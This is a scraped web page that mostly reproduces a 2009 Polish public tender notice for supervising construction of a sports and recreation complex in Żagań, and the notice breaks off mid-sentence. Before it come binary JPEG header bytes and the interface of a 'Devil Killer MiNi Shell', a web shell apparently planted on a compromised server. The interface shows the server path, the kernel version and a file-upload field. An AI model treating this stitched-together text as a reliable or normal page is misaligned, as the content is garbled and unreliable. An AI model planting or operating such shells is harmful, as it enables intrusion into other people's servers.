JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090714/236160-N-2009.html

<p class="kh_header"><b>Żagań: PROWADZENIE NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADANIA PN. BUDOWA KOMPLEKSU TURYSTYCZNO - REKREACYJNEGO W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 236160 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pałac Książęcy sp. z o. o. , ul. Szprotawska 4, 68-100 Żagań, woj. lubuskie, tel. 068 4776464, faks 068 4776462.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.palac.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PROWADZENIE NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADANIA PN. BUDOWA KOMPLEKSU TURYSTYCZNO - REKREACYJNEGO W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Zakres roboty budowlanej przewidzianej do wykonania w szczególności 
      obejmuje  zadania:
2.1.1. Budowa obiektu krytej pływalni 
2.1.2. Przebudowa obiektu socjalnego na hostel sportowy oraz budowa budynku 
          zaplecza socjalno-biurowego. 
2.1.3. Przebudowa boiska piłkarskiego i treningowego. 
2.1.4. Budowa bieżni ogólnej 400m, bieżni 100/110m, skoczni do skoku w dal, 
          skoczni do  skoku wzwyż, rzutni do rzutu oszczepem, rzutni do pchnięcia kulą, 
          rzutni do rzutu dyskiem i młotem.
2.1.5. Przebudowa trybun oraz dostarczenie trybuny demontowanej na 210 miejsc.
2.1.6. Budowa kortów tenisowych.
2.1.7. Oświetlenie boiska piłkarskiego i kortów tenisowych.
2.1.8. Ogrodzenie obiektu.
2.1.9. Nagłośnienie obiektu. 
          Budowle powstaną na terenie należącym do Pałacu Książęcego Sp. z o.o. w         
          bezpośrednim sąsiedztwie innych miejskich obiektów sportowych i 
          realizowane  będą na działkach nr 1844/3 i nr 1845 znajdujących się przy 
          ul. J. Kochanowskiego w Żaganiu, należących do Gminy Żagań o statusie 
          miejskim. Działka uzbrojona jest w : 
          - sieć ciepłowniczą 2x100 biegnącą w kanale podziemnym ze studzienką 
             kompensacyjną,
          - w sąsiedztwie ulicy J. Kochanowskiego równolegle do kanału ciepłowniczego 
             biegnie kabel elektroenergetyczny nn,  
          - od strony północnej wzdłuż jezdni wewnętrznej biegną dwa kable z czego 
             jeden w kierunku ul. J. Kochanowskiego, a drugi - oświetlenie terenu 
             zakręcić w kierunku  ciągu pieszo jezdnego przy boisku treningowym, 
          - w jezdni wewnętrznej biegnącej w kierunku głównej płyty boiska piłkarskiego 
            ułożona jest kanalizacja deszczowa O 160 i O 200, która łączy się w ulicy 
           J. Kochanowskiego z kanalizacją ogólnospławną O 200/250,
         - w części wschodniej działki 1844/3 istnieje końcówka sieci  wodociągowej O 
           25 spełniającej rolę wody gospodarczej dla kortu  tenisowego. 
           Wjazd na teren działki projektuje się od strony ulicy J. Kochanowskiego  
           w bezpośrednim sąsiedztwie ze skrzyżowaniem tej ulicy z ulicą Gen. Bema. 
           Przy wjeździe zaprojektowano parking dla 45 samochodów osobowych i 2 
          stanowiska dla osób niepełnosprawnych. 

2.2. OPIS POSZCZEGÓLNYCH ELEMENTÓW ZADANIA: 
2.2.1. BUDOWA OBIEKTU KRYTEJ PŁYWANI 
      Budowa zespołu basenu pływackiego o wymiarach 25,00x12,50 i głębokości 
       zmiennej od 1,80 do 1,20, basenu rekreacyjnego o wymiarach 12,50x6,50 i 
       głębokości  od 0,80 do 1,20, brodzika dla dzieci o wymiarach 5.60x2,50 i 
       głębokości 0,25, zjeżdżalni rynnowej o długości ześlizgu około 50,0m z rynną 
       hamowną, dwóch basenów SPA, sauny fińskiej i parowej, siłowni z zapleczem 
       szatniowym, kręgielni, sali do gry w squash, baru kawowego, kawiarenki 
       internetowej i sali bilardowej. Strefa kąpielowa pływalni to zespół basenu 
       pływackiego, basenu rekreacyjnego, brodzika dla dzieci i zjeżdżalni rynnowej o 
       długości ześlizgu około 50,0 m z rynną hamowną oraz dwóch basenów SPA.   
       Całość pływalni przystosowana jest do korzystania przez osoby 
       niepełnosprawne tj. zaprojektowano m. in. wewnętrzny dźwig osobowy 
      dostosowany dla wózka inwalidzkiego oraz pochylnie i rampy umożliwiające 
      dostęp do obiektu dla tych osób. Dojście do hallu pływalni,  w którym 
      zlokalizowano zespół kasowy prowadzi poprzez hall wejściowy,  do którego 
      wchodzić się będzie z  zewnątrz poprzez wiatrołap. W hallu  dostępna jest 
      szatnia ogólna na odzież  wierzchnią dla korzystających z  obiektu oraz 
      ogólnodostępny węzeł sanitarny. W hallu wejściowym nastąpi rozdział na 
      korzystających z pływalni, z saun, fitness, bowlingu i squash. Dojście do kawiarni 
      i  na widownię przewidziano osobną wydzieloną klatką schodową lub windą 
      dostosowaną dla osób niepełnosprawnych. Oprócz  strefy kąpielowej  obiekt 
      pływalni zawiera niżej wymienione funkcje zlokalizowane w przyziemiu, na które 
      składać się będą: 
      - sauna fińska z przebieralnią, 
      - sauna parowa z przebieralnią,       
      - siłownia (fitness) z zapleczem szatniowym, 
      - kręgielnia (bowling) dwutorowa w wersji  master-full,
      - sala zespołu do gry podwójnej w squash.
      Powyższe zespoły posiadać będą niezbędne pomieszczenia szatniowe,
      techniczne i obsługi. Dostęp do przyziemia z parteru zaprojektowano przy 
      pomocy  windy przystosowanej dla niepełnosprawnych lub wydzielonej 
      przeciwpożarowo klatki schodowej. Hall wejściowy parteru spełniać ma również 
      rolę pomieszczenia wypoczynkowego. W przyziemiu przewiduje się również 
      zespół szatniowo-socjalny dla obsługi technicznej i osobno  dla obsługi 
      porządkowej. Na pierwszym piętrze przedmiotowego obiektu zlokalizowano: 
      - bar kawowy z częścią konsumpcyjną wydzieloną od przestrzeni basenowej 
        ścianką przeszkloną umożliwiającą oglądanie zajęć w  basenach, służący 
        również do wypoczywania po skorzystaniu z usług  pływalni, a także miejsce 
        oczekiwania zwłaszcza dla grup zorganizowanych, 
      - zaplecze baru kawowego,
      - kawiarenkę internetową, 
      - salę bilardową, 
      - widownię na obniżonym poziomie wydzieloną z części kawiarnianej 
       (w przestrzeni basenowej) na 46 miejsc siedzących.
      W części przyziemia zlokalizowany będzie cały zespół techniczno-technologiczny 
      związany z pływalnią. Na tym poziomie zaprojektowane zostało: technologia 
      basenowa, rozdzielnia elektryczna i zespół wentylatorowi. Dojście do tych 
      pomieszczeń będzie możliwe zarówno z hallu wejściowego jak i bezpośrednio z 
      zewnątrz  budynku.   
      Dane techniczne obiektu : 
      - powierzchnia zabudowy PZ= 2 042,25 m2,
      - powierzchnia całkowita PC= 4 209,48 m2,
      - powierzchnia użytkowa PU= 3560,15 m2,
      - kubatura V = 20 275,61 m3.

2.2.2. PRZEBUDOWA OBIEKTU SOCJALNEGO NA HOSTEL SPORTOWY   
       ORAZ BUDOWA ZAPLECZA SOCJALNO-BIUROWEGO 
        Przebudowa budynku socjalno-biurowego byłego OSIR Żagań na hostel z 
        dobudową klatki schodowej i wiatrołapu. 
        Zakres  prac dla tej części inwestycji obejmuje zmianę sposobu użytkowania 
        budynku socjalno-biurowego, dobudowę klatki schodowej i wiatrołapu do w/w 
        budynku. Istniejący budynek jest obiektem dwukondygnacyjnym murowanym z 
        cegły pełnej i kratówki, stropy z elementów drobnowymiarowych (strop DZ-5). 
        Dach płaski kryty papą  asfaltową . 
        Dane techniczne: 
       - powierzchnia zabudowy części istniejącej mieszkania - 223,71 m2,
       - powierzchnia użytkowa - 359,55 m2,
       - kubatura - 1409,37 m3.
     W ramach przebudowy budynku biurowego na hostelik planuje się pokoje o 
      następującej strukturze: 
      Parter : 
      - 3 pokoje 2 osobowe w tym 1 pokój dla osoby niepełnosprawnej
      - 2 pokoje 1 osobowe
      - węzeł sanitarny ogólnodostępny damski z funkcją dla osoby 
         niepełnosprawnej i węzeł męski
      - pomieszczenie gospodarcze z magazynem na bieliznę brudną.  
      Piętro: 
      - 2 pokoje 2 osobowe 
      - 2 pokoje 3 osobowe 
      - 1 pokój 1 osobowy
      - magazynek na bieliznę czystą,  z możliwością czasowej funkcji  biurowej. 
      Zaprojektowane pokoje służyć będą do obsługi imprez organizowanych przez  
      miasto. Pokoje będą o  średnim standardzie wyposażenia (kanapy, szafy  
      ubraniowe, stoliki,  krzesła). Ogółem w obiekcie będzie możliwość  
      zakwaterowania 19 osób. W celu zapewnienia funkcjonalności 
      i zgodności z wymogami p.poż. obiektu, zaprojektowano nową klatkę schodową i 
      wiatrołap.

      Budynek zaplecza socjalno-biurowego na działce nr ewid. 1844/3. 
      Przedmiotem zadania jest: 
      - budynek zaplecza socjalno-biurowego, dwukondygnacyjny;
      - łącznik - pomiędzy istniejącym budynkiem hostelowym  (po przebudowie), 
        a projektowanym budynkiem - połączenie w poziomie piętra; zlokalizowanych 
        w Żaganiu przy ulicy J. Kochanowskiego, w północno-wschodnim narożniku  
       stadionu lekkoatletycznego.
      Przeznaczenie obiektu : 
       W projektowanym budynku zlokalizowano następuję funkcje: 
       W parterze: 
       - 4 zespoły szatni dla 12 osób - każda, 
       - 2 zespoły umywalni, z 3 natryskami - każda, 
       - 2 pokoje trenerskie z aneksem sanitarnym - każdy, 
       - 2  pokoje trenerskie z aneksem sanitarnym - każdy, 
       - 1 pokój sędziów z aneksem sanitarnym, 
       - 1 pokój biurowy.
       Na piętrze: 
       - pokój sprawozdawców - 10 osobowy, 
       - sala konferencyjna na 16 osób, 
       - 4 pokoje hotelowe 2 osobowe z aneksem sanitarnym, 
       - 1 pokój biurowy, 
       - aneks kuchenny.
      Projektowany budynek w poziomie piętra połączono łącznikiem z istniejącym 
      budynkiem - po modernizacji - hostelowym. Inwestor przewiduje obsługę 
      techniczną budynku załogą zatrudnioną w ośrodku, która swoje 
      zaplecze socjalno-sanitarne ma zlokalizowane w Hali Sportowo - Widowiskowej. 
      Pomieszczenie biurowe w parterze projektowanego budynku będzie 
      jednocześnie pełniło rolę zaplecza socjalnego - dla załogi dochodzącej (np. 
      szatnia odzieży na przejście, itp.).  

2.2.3. PRZEBUDOWA BOISK PIŁKARSKIEGO I TRENINGOWEGO 
      Przedmiotem tej części zadania jest renowacja nawierzchni trawiastej głównej 
      płyty boiska piłkarskiego oraz budowa boiska treningowego o nawierzchni z 
      trawy syntetycznej. 

      Boisko piłkarskie 
      Na istniejącym boisku głównym istniejąca nawierzchnia trawiasta jest w 
      znacznym stopniu zniszczona. Znaczące ubytki trawy, twardość nawierzchni 
      oraz istniejące nierówności powierzchni płyty uniemożliwiają funkcjonalne 
      korzystanie z obiektu. Projektuje się całkowitą wymianę trawy  wraz z glebą i 
      wykonanie drenażu. Zakres  prac obejmuje: 
      - chemiczne spalenie istniejącego porostu roślin boiska 
      - usunięcie darni obecnie porastającej  boisko 
      - równanie nawierzchni boiska,
      - głębokie spulchnienie boiska, 
      - rozluźnienie (wymieszanie) warstwy urodzajnej murawy boiska
      - ręczne profilowanie i zagęszczanie podłoża - profilowanie układu kopertowego 
        spadków powierzchni boiska
      - wykonanie trawników dywanowych siewem z nawożeniem.
      Wymiary boiska wynoszą 100mx60m.
      Odwodnienie: 
      Należy zastosować odwodnienie wymuszone w postaci drenażu z rur      
      perforowanych o średnicy O 100mm. Rury drenarskie powinny być ułożone 
      w równoległych ciągach, w odległości 10m od siebie. Po obu  stronach boiska 
      powinny być wpięte do kolektora zbiorczego o średnicy O 200 mm,
      odprowadzających wodę do systemu ogólnospławnego. Minimalna głębokość 
      ułożenia drenażu wynosi 80 cm licząc od góry konstrukcji. Wszystkie rurociągi 
      obsypać kruszywem 8-16 płukanym 30 cm ponad  wierzch rur. Odprowadzenie 
      wód poprzez studzienkę PVC O 315 do projektowanej studni chłonnej  fi 1500. 
      Od studzienki SD-1 do S-1 ułożyć rurę kanalizacyjną PVC O 200 klasy S. 

     Boisko treningowe
     Projektuje się nawierzchnię z trawy syntetycznej wysokości 5cm. Płyta  boiska 
     będzie ograniczona obrzeżem chodnikowym 30x8 cm ułożonym na ławie 
     betonowej z betonu B-15. 
     Zakres opracowania: 
     - boisko o nawierzchni z trawy  syntetycznej 60x93m 
     - wykonanie podbudowy 
     - wykonanie ogrodzenia z siatki powlekanej 5x5 cm na całym obwodzie  o 
       h = 4,0m
     - montaż bramek 2 kpl. 
     - wykonanie furtek wejściowych szt.  2 + wyjazd techniczny.



2.2.4. BUDOWA BIEŻNI OGÓLNEJ 400M, BIEŻNI 100/110M, SKOCZNI DO  
         SKOKU W DAL, SKOCZNI DO SKOKU WZWYŻ, RZUTNI DO RZUTU 
         OSZCZEPEM, RZUTNI DO PCHNIECIA KULĄ, RZUTNI DO RZUTU  
         DYSKIEM I MŁOTEM.
        Projektuje się wykonanie płyty głównej następująco: 
       - wykonanie koryta na całej powierzchni o głębokości 30cm 
       - wykonanie warstwy podsypkowej gr. 10 cm po zagęszczeniu 
       - wykonanie podbudowy z kruszywa łamanego gr. 20 cm po zagęszczeniu   
       - montaż obrzeży chodnikowych 8x30 cm na podbudowie betonowej
       - wykonanie nawierzchni z tworzywa sztucznego. 

 2.2.5. PRZEBUDOWA  TRYBUN, TRYBUNA DEMONTOWALNA NA 210 MIEJSC.
       Przedmiotem tej części zadania jest remont istniejących trybun na stadionie 
       przy ul. Kochanowskiego w Żaganiu. Aktualnie trybuny pozostają w bardzo złym 
       stanie technicznym wymagającym natychmiastowego remontu. Prace takie są 
       niezbędne do tego aby trybuny mogły spełniać funkcje, które są  im przypisane. 
       Trybuny są na nasypie ziemnym o wysokości 4m. Konstrukcja trybun jest 
       mieszana: 
       - pionowe belki żelbetonowe o rozstawie 8-90 cm. Wypełnienie pomiędzy 
         poszczególnymi poziomami płytkami chodnikowymi 30x30,  
       - różnica poziomów wynosi 40 cm,
       - na elementach betonowych brak jest ławek drewnianych, a poszczególne  
         belki  są nieregularnie odkształcone, 
       - płytki chodnikowe wraz z elementami betonowymi są zniszczone (pęknięcia, 
         nierówne powierzchnie płytek) od działania wody i  długotrwałego użytkowania. 
       Stan techniczny trybun całkowicie uniemożliwia ich użytkowanie, natomiast    
       schody zejściowe zagrażają bezpieczeństwu użytkownika. 
       Projektuje się całkowita rozbiórkę istniejących  trybun drewniano -  betonowych 
       ze względu na znaczne zniszczenia. Nowe trybuny z miejscami siedzącymi 
       projektuje się jako żelbetonowe wraz ze schodami zejściowymi i barierkami  
       stalowymi. Całość trybun podzielono na sektory. W ramach tej części inwestycji 
       należy rozebrać ciągi piesze z płytek na dolnym poziomie o szerokości 2,05 m i 
       górnym poziomie o szerokości 2,00m. Nowe trybuny projektuje się jako 
       schodkowe w formie skośnej płyty żelbetonowej z wyniesionymi stopniami 
       betonowymi. Jako miejsca siedzące dla widzów zastosowano indywidualne 
       siedziska z tworzyw sztucznych. Dojścia do poszczególnych poziomów 
       zapewniają żelbetonowe schody  transportowe o konstrukcji analogicznej jak 
       trybuny. Po wykonaniu robót rozbiórkowych należy uzupełnić i zniwelować 
       istniejący nasyp skarpy. Skarpę uformować z zachowaniem kąta około 26-27 
       stopni w stosunku do płaszczyzny poziomu. W trakcie robót grunt będzie 
       zagęszczany warstwowo. Pod płytę zostanie ułożona podsypka piaskowa o 
       grubości 5cm. Trybuna zostanie wykonania jako skośna monolityczna płyta 
       żelbetonowa z wyniesionymi stopniami betonowymi. Płyta całą powierzchnią 
       posadowiona będzie na zniwelowanym nasypie i zakończona w dolnej i górnej 
       partii fundamentami (ścianami) oporowymi. Płyta będzie wykonania z 10 cm 
       betonu B 20 i zbrojona siatką zbrojeniową. Zbrojenie płyty przewiązane będzie 
       ze zbrojeniem fundamentu oporowego wykonanego z prętów o średnicy 8mm 
       przy  czym co trzeci pręt podłużny z płyty zostanie  odgięty i przeciągnięty do 
       końca fundamentu dolnego. Zbrojenie podłużne ścian oporowych zostanie 
       wykonane z prętów żebrowanych o średnicy  14mm. Stopnie betonowe 
       wykonane będą o  wymiarach przekroju 40x100cm (wzniesienie stopni 1; 2 ) co 
       daje kąt nachylenia stoku 26,56 stopni. Schody transportowe stanowiące 
       dojścia na poszczególne poziomy trybun  wykonane zostaną jako skośna 
       monolityczna pływa żelbetonowa o konstrukcji analogicznej jak trybuna 
       schodkowa. Schody projektuje się jako jednobiegunowe o  stopniach 20x40 cm 
       przy założeniu, że każdy jeden z dwóch stopni z odpowiadającym schodkiem 
       trybuny posiada ten sam poziom do stopień trybuny. Jako miejsca siedzące 
       wykonane zostaną  indywidualne siedziska z tworzywa sztucznego firmy OMSI 
       lub równoważne. Przyjęto siedziska bez oparć  typu SS-M90, które obejmują 
       swoją przednią częścią schodek betonowy. Siedziska zamontowane będą 
       bezpośrednio do podłoża betonowego za pośrednictwem kotew rozporowych o 
       wymiarach i parametrach zalecanych przez producenta siedzisk. Siedziska 
       zostaną  zamontowane  z zachowaniem odległości 60 cm w osiach. W ramach 
       tej części inwestycji wykonane zostaną ciągi komunikacyjne z polbruku grubości 
       6 cm na podsypce  piaskowo-cementowej grubości  15 cm. Krawężnik 
       chodnikowy grubości 6cm. Odwodnienie trybun zostanie wykonane za pomocą 
       istniejącego odwodnienia powierzchniowego z płyt żelbetonowych o szerokości 
       40cm. woda odprowadzana będzie do studni chłonnych istniejących. Całość 
       odwodnienia należy przełożyć i uzupełnić uszkodzone elementy.

       Trybuna demontowana 210 miejsc: 
        - konstrukcja stalowa ocynkowana rozbieralna 
        - podest stalowy ocynkowany, kraty typy VENA 
        - cztery rzędy siedzisk dla obiektów sportowych
        - balustrada ocynkowana 
        - szerokość trybun 3,30m
        - wysokość max. Podestu + 0,75 m 
  
2.2.6. BUDOWA KORTÓW TENISOWYCH - SZT. 2
      Budowa kortów tenisowych o nawierzchni z trawy syntetycznej wraz z 
      ogrodzeniem. Przedmiotem zadania  jest budowa kortów tenisowych  o 
      nawierzchni z trawy syntetycznej wraz z ogrodzeniem. W zadaniu użyta zostanie 
      syntetyczna trawa wielofunkcyjna o wysokości włókna 18mm. Nawierzchnia ta 
      jest  przeznaczona na  korty tenisowe i sportowe boiska do gier zespołowych
      (siatkówka, koszykówka, piłka ręczna, piłka nożna). Nawierzchnia instalowana 
      jest na podbudowie dynamicznej (mineralnej). Cały system składa się z 
      nawierzchni syntetycznej oraz wypełnienia piaskiem kwarcowym. Sama trawa 
      zbudowana jest w następujący sposób: w lateksową warstwę nośną wplecione 
      są  włókna fibrylizowane o wysokości 18mm. Materiał, z którego wykonane jest 
      włókno, to 100 % polipropylen. 
      Dane techniczne kortu tenisowego 
       - wymiary kortu - 23,77 x 10,97 m
       - wymiary boiska - 36,00 x 20,27 m 
       - wymiary ogrodzenia - 36,00 x 20,27 m
       - wysokość ogrodzenia bocznego - 2 m 
       - wysokość ogrodzenia czołowego (piłkochwyt) - 4 m 
      Charakterystyka trawy syntetycznej : 
       - skład włókna - 100 % polipropylen, 
       - wysokość włókna - minimum 18 mm 
       - rodzaj włókna - fibrylizowane
       - ilość pęczków - minimum 39. 500 pęczków na m 2
       - ciężar włókna - minimum 6 600 Dtex 
       - wypełnienie - wypłukany i wysuszony piasek kwarcowy 
       - gwarancja - minimum 5 lat. 
      Charakterystyka piasku: 
      Piasek krzemionkowy, okrągły i wysuszony zgodny z oficjalnie przyjętymi 
      normami w kraju instalacji trawy. 
      Podbudowa boiska powinna spełniać następujące wymagania techniczne: 
       - nośność wyrażona stosunkiem modułów E2 / E1 <= 2,2
       - dopuszczalne nierówności 
       - spadki zgodne ze spadkami projektowanymi w dokumentacji technicznej.
      Podbudowy z kruszywa powinny odpowiadać wymaganiom związanym z
      nośnością, zagęszczeniem oraz równością sprawdzanym  po zakończeniu 
      każdej  z warstw.
      Wyposażenie kortów: 
       - słupki do tenisa profesjonalne stalowe cynkowane ogniwo z wewnętrznym 
         naciągiem, siatki - 1 para, 
       - siatka profesjonalna do tenisa ziemnego extra - 2 szt. 
       - tuleja montażowa słupka tenisowego - 2 szt. 
       - stanowisko sędziowskie do tenisa.
       Projektuje się ogrodzenie boiska z siatki powlekanej 5 x 5 cm w następujący 
       sposób : wzdłuż boiska ogrodzenie o wysokości 2,00 m na słupkach  stalowych, 
       ogrodzenie czołowe boiska o wysokości 4,00m na słupkach stalowych. Słupki 
       ogrodzeniowe z rur malowane farbą chlorokauczukową 2x po uprzednim 
       wykonaniu podkładu.  Rozstaw słupków co 3,00m. Słupki zabetonowane w
       fundamencie 50x50x80 z betonu B20. Wszystkie słupki narożne należy 
       wzmocnić poprzez zastosowanie słupków podporowych o wysokości 2 m. 
   
2.2.7. OŚWIETLENIE BOISK PIŁKARSKICH, KORTÓW TENISOWYCH I BOISKA 
        DO KOSZYKÓWKI 
        W zakres robót wchodzi: 
        - zasilanie kablowego projektowanego kompleksu sportowego, 
        - szafka pomiarowa SP dla półpośredniego pomiaru energii elektrycznej, 
        - szafka  rozdzielcza SR i SW 0,4 kV dla obwodów  odbiorczych 0,4 kV 
          kompleksu sportowego
        - maszty oświetleniowe i słupy oświetleniowe dla projektorów. Maszty o 
          wysokości 16,0 i 20,0 m o konstrukcji stalowej są zamocowane sztywno w 
          żelbetowych stopach fundamentowych
        - wyposażenie.

 2.2.8. OGRODZENIE OBIEKTU 
        Ze względu na rozbudowę i budowę nowych obiektów na terenie działki nr 
        1844/3 zachodzi konieczność wykonania nowych ogrodzeń. Jest to  
        podyktowane zwiększeniem oferowanych usług w kompleksie sportowym, a 
        mianowicie:  
        - oddzielenie ogólnodostępnego placu zabaw od części sportowej 
        - oddzielenie ogólnodostępnego hostelu i budynku socjalno-biurowego od 
          części sportowej 
        - oddzielenie części kompleksu basenu od części sportowej. 
        
        Wejścia na kompleks sportowy odbywać się będą poprzez zaprojektowane 
        bramy oraz furtki. Ogrodzenie powinno być z siatki na słupach stalowych 
        ocynkowanych O 50 i malowanych proszkowo. Siatka powlekana 5x5 cm. 
        Wysokość ogrodzenia h=2,00m. Rozstaw słupków co 2,5 m. 
        Słupki bramowe należy wzmocnić zastrzałem z rury stalowej-ocynkowanej.  
 2.2.9. NAGŁOŚNIENIE OBIEKTU  
        Przedmiotem tego zadania jest instalacja nagłośnieniowa obiektu sportowego - 
         boisk: piłkarskiego, do koszykówki i kortów tenisowych. Nagłośnienie będzie 
         oparte na instalacji sieci 100V z podziałem na strefy.   
         Opis zadania: 
        Przy budowie  sieci radiowęzła nagłaśniającego projektuje się instalację 
         monofoniczną ze względu na fakt, że słuchacze są w ciągłym ruchu i efekt 
         stereo niemożliwy byłby do uzyskania we właściwej jakości na całej przestrzeni 
         odsłuchiwania. Zastosowano nagłośnienie strefowe z możliwością 
         priorytetowego wejścia z komunikatem nadrzędnym. Zastosowano urządzenia 
         produkcji firmy np. ELEKTRONIKA /lub równoważne/  w systemie instalacji 
         100V z  zastosowaniem transformatorów dopasowujących. Upraszcza to w 
        znacznym stopniu instalację i późniejszą eksploatację systemu nagłośnienia.  
        Zastosowano wzmacniacz  strefowy jako zasadnicze źródło dźwięku dla boisk  
        do kosza i kortów tenisowych (2 strefy) WM-6505p o mocy wyjściowej 500 W.
        Do nagłośnienia boiska piłkarskiego został dedykowany wzmacniacz 100V 
        500W - W-505, z możliwością podłączenia stolika mikserskiego i mikrofonów 
        przenośnych bezprzewodowych. Wzmacniacze zostaną zainstalowane w szafie 
